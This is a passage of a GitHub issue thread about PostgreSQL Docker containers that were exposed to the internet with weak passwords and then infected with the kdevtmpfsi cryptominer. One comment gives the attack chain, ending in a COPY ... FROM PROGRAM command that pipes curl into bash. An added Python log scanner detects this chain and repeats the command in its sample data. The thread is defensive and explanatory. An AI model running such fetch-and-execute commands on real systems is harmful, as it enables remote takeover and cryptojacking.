Closed cottons-kr closed 1 year ago
This is an unfortunate consequence of having a public-facing instance with a compromised (or simple) password.
https://github.com/docker-library/postgres/issues/817#issuecomment-781482631
https://github.com/docker-library/postgres/issues/798#issuecomment-747610025
See also:
https://github.com/docker-library/redis/issues/217
https://github.com/docker-library/redis/issues/225
https://github.com/docker-library/php/issues/1110
https://github.com/docker-library/php/issues/1127
I wonder how someone is able to install mining malware if they can only access your database via the psql console?
@zedefi:
> I wonder how someone is able to install mining malware if they can only access your database via the psql console?
Attack Sequence: open port + brute force attack +
COPY ... FROM PROGRAM 'curl http://1xx.1x.7x.1/1.sh | bash';
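A defender-side check for the sequence described in the comment above, added here as an example and not part of the original thread: it scans PostgreSQL server log lines for repeated failed logins per client and for any logged `COPY ... FROM/TO PROGRAM` statement. The log settings, the sample log lines, the addresses and the `analyze` helper are assumptions made for illustration.

```python
import re
from collections import Counter

# Assumed server settings (not stated in the thread): log_line_prefix '%m [%p] ',
# log_connections = on, and log_statement covering COPY (e.g. 'all').
LINE = re.compile(r"\[(?P<pid>\d+)\] [A-Z]+:\s+(?P<msg>.*)$")
CONN = re.compile(r"connection received: host=(?P<host>\S+)")
AUTH_FAIL = "password authentication failed for user"
COPY_PROGRAM = re.compile(r"\bCOPY\b.*\b(?:FROM|TO)\s+PROGRAM\b", re.IGNORECASE)

# Constructed sample log; addresses are documentation ranges, not real indicators.
SAMPLE_LOG = """\
2024-05-01 03:10:01.100 UTC [101] LOG:  connection received: host=203.0.113.7 port=40110
2024-05-01 03:10:01.200 UTC [101] FATAL:  password authentication failed for user "postgres"
2024-05-01 03:10:02.100 UTC [102] LOG:  connection received: host=203.0.113.7 port=40112
2024-05-01 03:10:02.200 UTC [102] FATAL:  password authentication failed for user "postgres"
2024-05-01 03:10:03.100 UTC [103] LOG:  connection received: host=203.0.113.7 port=40114
2024-05-01 03:10:03.200 UTC [103] FATAL:  password authentication failed for user "postgres"
2024-05-01 03:10:04.100 UTC [104] LOG:  connection received: host=203.0.113.7 port=40116
2024-05-01 03:10:04.200 UTC [104] LOG:  connection authorized: user=postgres database=postgres
2024-05-01 03:10:05.000 UTC [104] LOG:  statement: COPY cmd_out FROM PROGRAM 'curl http://example.invalid/1.sh | bash';
2024-05-01 09:00:00.100 UTC [201] LOG:  connection received: host=198.51.100.20 port=51000
2024-05-01 09:00:00.200 UTC [201] FATAL:  password authentication failed for user "app"
2024-05-01 09:00:05.100 UTC [202] LOG:  connection received: host=198.51.100.20 port=51002
2024-05-01 09:00:06.000 UTC [202] LOG:  statement: COPY import_rows FROM '/data/rows.csv' WITH (FORMAT csv);
""".splitlines()

def analyze(lines, fail_threshold=3):
    """Return ({host: failed logins >= threshold}, [(host, COPY ... PROGRAM statement)])."""
    pid_host, failures, program_stmts = {}, Counter(), []
    for line in lines:
        m = LINE.search(line)
        if not m:
            continue
        pid, msg = m["pid"], m["msg"]
        conn = CONN.search(msg)
        if conn:
            pid_host[pid] = conn["host"]  # map backend PID to its client address
        elif AUTH_FAIL in msg:
            failures[pid_host.get(pid, "unknown")] += 1
        elif msg.startswith("statement:") and COPY_PROGRAM.search(msg):
            stmt = msg[len("statement:"):].strip()
            program_stmts.append((pid_host.get(pid, "unknown"), stmt))
    brute = {h: n for h, n in failures.items() if n >= fail_threshold}
    return brute, program_stmts

if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

A plain `COPY ... FROM '/path/file'` is not flagged; only the `PROGRAM` form, which runs a shell command as the server's OS user, is reported.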
Well said @ImreSamu. Yes, that's actually true; I faced the same issue because of exposing database ports to the internet.
I have the same issue because of having a weak password. Changing the password to a strong one works for me.
One thing I found useful was to sudo -u postgres crontab -e where I found the cronjob that kept restarting it. After deleting that it seems to have quietened down. Fingers crossed!
I noticed that /tmp/kdevtmpfsi is using all CPU resources, so I tried to remove it, but it was in /var/lib/docker/overlay2/.../.../merged. I stopped the PostgreSQL container because it was the only running container on the server.